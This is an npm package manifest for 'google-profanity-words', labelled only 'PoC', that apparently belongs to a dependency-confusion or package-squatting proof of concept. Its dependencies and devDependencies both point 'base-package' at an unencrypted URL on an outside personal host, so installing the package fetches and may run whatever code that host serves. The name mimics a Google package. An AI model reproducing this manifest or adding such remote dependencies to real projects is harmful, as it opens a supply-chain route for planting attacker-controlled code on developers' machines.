google-profanity-words
Version:
PoC
21 lines (19 loc) • 433 B
JSON
{
"name": "google-profanity-words",
"version": "1.0.4",
"description": "PoC",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"dependencies": {
"base-package": "http://npm.ezequielpuig.space/"
},
"devDependencies": {
"base-package": "http://npm.ezequielpuig.space/"
},
"keywords": [],
"author": "ezequielpuig",
"license": "ISC",
"type": "commonjs"
}